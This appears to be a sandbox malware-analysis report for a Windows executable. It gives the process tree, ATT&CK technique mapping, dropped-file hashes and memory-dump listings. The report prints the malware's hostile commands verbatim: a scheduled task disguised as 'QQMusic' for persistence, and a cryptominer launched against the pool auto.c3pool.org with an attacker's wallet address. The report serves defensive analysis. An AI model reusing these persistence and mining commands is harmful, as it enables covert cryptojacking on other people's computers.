PID 2248 wrote to memory of 2260	2248	cmd.exe	ipconfig.exe
PID 2248 wrote to memory of 2260	2248	cmd.exe	ipconfig.exe
PID 1936 wrote to memory of 1480	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 1480	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 1480	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 1480	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
"C:\Users\Admin\AppData\Local\Temp\d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Program Files directory
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1936

C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:2208

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe /F
3⤵
- Creates scheduled task(s)
PID:2952

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadTpqrst.exe&&exit
2⤵
- Suspicious use of WriteProcessMemory
PID:2948

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadTpqrst.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1592

C:\Windows\SysWOW64\cmd.exe
cmd /c ipconfig /flushdns
2⤵
- Suspicious use of WriteProcessMemory
PID:1536

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
3⤵
- Gathers network information
PID:1552

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2176

C:\ProgramData\SMB.exe
C:\ProgramData\SMB.exe
2⤵
- Executes dropped EXE
PID:1480

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadTpqrst.exe&&exit
2⤵
- Suspicious use of WriteProcessMemory
PID:2412

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadTpqrst.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:264

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
PID:2976

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:624

C:\Windows\SysWOW64\cmd.exe
cmd /c ipconfig /flushdns
2⤵
- Suspicious use of WriteProcessMemory
PID:2248

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
3⤵
- Gathers network information
PID:2260

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadTpqrst.exe&&exit
2⤵
PID:1480

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadTpqrst.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1664

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
PID:1472

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1676

C:\Windows\SysWOW64\cmd.exe
cmd /c ipconfig /flushdns
2⤵
PID:556

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
3⤵
- Gathers network information
PID:1460

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadTpqrst.exe&&exit
2⤵
PID:2000

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadTpqrst.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1216

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1840

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2112

C:\Windows\SysWOW64\cmd.exe
cmd /c ipconfig /flushdns
2⤵
PID:1496

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
3⤵
- Gathers network information
PID:1516

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadTpqrst.exe&&exit
2⤵
PID:2096

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadTpqrst.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1648

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
PID:2980

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2760

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadTpqrst.exe&&exit
2⤵
PID:2168

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadTpqrst.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3020

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2548

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2368

C:\Windows\SysWOW64\cmd.exe
cmd /c ipconfig /flushdns
2⤵
PID:1588

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
3⤵
- Gathers network information
PID:756

C:\Windows\system32\taskeng.exe
taskeng.exe {5259ADC5-DC93-4255-A197-29A74EB2EF25} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1464

C:\Users\Admin\AppData\Local\Temp\d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
C:\Users\Admin\AppData\Local\Temp\d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
2⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
PID:2984

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Command and Scripting Interpreter

1

T1059

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

3

T1082

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\X64.dll
Filesize
85KB

MD5
0517bc2bf2b351ed3007e70b5494acbd

SHA1
1033c86d319a70a6c1ecfd47005834efdd296f83

SHA256
c27df5d3ba7b3075410dbcf5d3d9ce50253236756d0bb7ee0880e9df04621877

SHA512
5ecb487cdb21eb6b22b16e0937703bb773fc8cd761b48f1529663507fbda64b35f9915bfec5f534d1e3cf82f86a9ac3d089b31cd114e4b5f5a59eb88fb07ccae

Download Submit
C:\ProgramData\X86.dll
Filesize
71KB

MD5
c0ccc4cbb4ae1b3622f7d3a7452851a1

SHA1
08d40d778cb229f260c4b6c4a0e29a4fc8c647ff

SHA256
f10b8e6484785e18762a61a0f2fab30283475991a980d56b45cebbdcb655533c

SHA512
ff90b5f726e117a645e2fd3f09843d8eea76a0da23899d6e66d74fb3702b012594ba29d6288c714773fd574ae61f19c018b968d8755339dbf9740e24396ae025

Download Submit
C:\Users\Admin\AppData\Local\Temp\d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
Filesize
9.0MB

MD5
2d927fdb462570728a981443bf36d19f

SHA1
eb4f351d937729b14a196bf228ba12a2ff07e73e

SHA256
d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239

SHA512
efdf3b568fa07d67bb89eb8880c5140653321f9267c771045d1c7be6a6e88fd680059b779d2e4da497e0a88ff1e9adac6e293bb254e5c4dda776aafd518097c9

Download Submit
\ProgramData\SMB.exe
Filesize
3.1MB

MD5
7b2f170698522cd844e0423252ad36c1

SHA1
303ac0aaf0e9f48d4943e57d1ee6c757f2dd48c5

SHA256
5214f356f2e8640230e93a95633cd73945c38027b23e76bb5e617c71949f8994

SHA512
7155477e6988a16f6d12a0800ab72b9b9b64b97a509324ac0669cec2a4b82cd81b3481ae2c2d1ce65e73b017cebb56628d949d6195aac8f6ddd9625a80789dfa

Download Submit
\ProgramData\spreadTpqrst.exe
Filesize
1.3MB

MD5
23d84a7ed2e8e76d0a13197b74913654

SHA1
23d04ba674bafbad225243dc81ce7eccd744a35a

SHA256
ac530d542a755ecce6a656ea6309717ec222c34d7e34c61792f3b350a8a29301

SHA512
aa6b0100d477214d550b6498787190fc1a8fafa7c478f9595d45e4e76ece9888b84dcca26696500d5710a9d1acae4810f2606d8962c46d31f2bdfcdd27bd675c

Download Submit
memory/624-154-0x000000013F1E0000-0x000000013F824000-memory.dmp

Filesize
6.3MB

Download
memory/624-152-0x000000013F1E0000-0x000000013F824000-memory.dmp

Filesize
6.3MB

Download
memory/624-151-0x000000013F1E0000-0x000000013F824000-memory.dmp

Filesize
6.3MB

Download
memory/1472-160-0x000000013F170000-0x000000013F7B4000-memory.dmp

Filesize
6.3MB

Download
memory/1472-158-0x000000013F170000-0x000000013F7B4000-memory.dmp

Filesize
6.3MB

Download
memory/1676-167-0x000000013FDE0000-0x0000000140424000-memory.dmp

Filesize
6.3MB

Download
memory/1676-165-0x000000013FDE0000-0x0000000140424000-memory.dmp

Filesize
6.3MB

Download
memory/1676-163-0x000000013FDE0000-0x0000000140424000-memory.dmp

Filesize
6.3MB

Download
memory/1840-172-0x000000013F540000-0x000000013FB84000-memory.dmp

Filesize
6.3MB

Download
memory/1840-170-0x000000013F540000-0x000000013FB84000-memory.dmp

Filesize
6.3MB

Download
memory/1936-9-0x00000000043A0000-0x00000000049E4000-memory.dmp

Filesize
6.3MB

Download
memory/2112-177-0x000000013FE40000-0x0000000140484000-memory.dmp

Filesize
6.3MB

Download
memory/2112-175-0x000000013FE40000-0x0000000140484000-memory.dmp

Filesize
6.3MB

Download
memory/2112-179-0x000000013FE40000-0x0000000140484000-memory.dmp

Filesize
6.3MB

Download
memory/2176-136-0x000000013FEE0000-0x0000000140524000-memory.dmp

Filesize
6.3MB

Download
memory/2176-11-0x00000000000F0000-0x0000000000104000-memory.dmp

Filesize
80KB

Download
memory/2176-142-0x000000013FEE0000-0x0000000140524000-memory.dmp

Filesize
6.3MB

Download
memory/2176-10-0x000000013FEE0000-0x0000000140524000-memory.dmp

Filesize
6.3MB

Download
memory/2368-203-0x000000013F650000-0x000000013FC94000-memory.dmp

Filesize
6.3MB

Download
memory/2368-202-0x000000013F650000-0x000000013FC94000-memory.dmp

Filesize
6.3MB

Download
memory/2548-198-0x000000013F920000-0x000000013FF64000-memory.dmp

Filesize
6.3MB

Download
memory/2548-195-0x000000013F920000-0x000000013FF64000-memory.dmp

Filesize
6.3MB

Download
memory/2760-192-0x000000013F7F0000-0x000000013FE34000-memory.dmp

Filesize
6.3MB

Download
memory/2760-190-0x000000013F7F0000-0x000000013FE34000-memory.dmp

Filesize
6.3MB

Download
memory/2760-188-0x000000013F7F0000-0x000000013FE34000-memory.dmp

Filesize
6.3MB

Download
memory/2976-145-0x000000013F8D0000-0x000000013FF14000-memory.dmp

Filesize
6.3MB

Download
memory/2976-147-0x000000013F8D0000-0x000000013FF14000-memory.dmp

Filesize
6.3MB

Download
memory/2980-185-0x000000013FF00000-0x0000000140544000-memory.dmp

Filesize
6.3MB

Download
memory/2980-182-0x000000013FF00000-0x0000000140544000-memory.dmp

Filesize
6.3MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads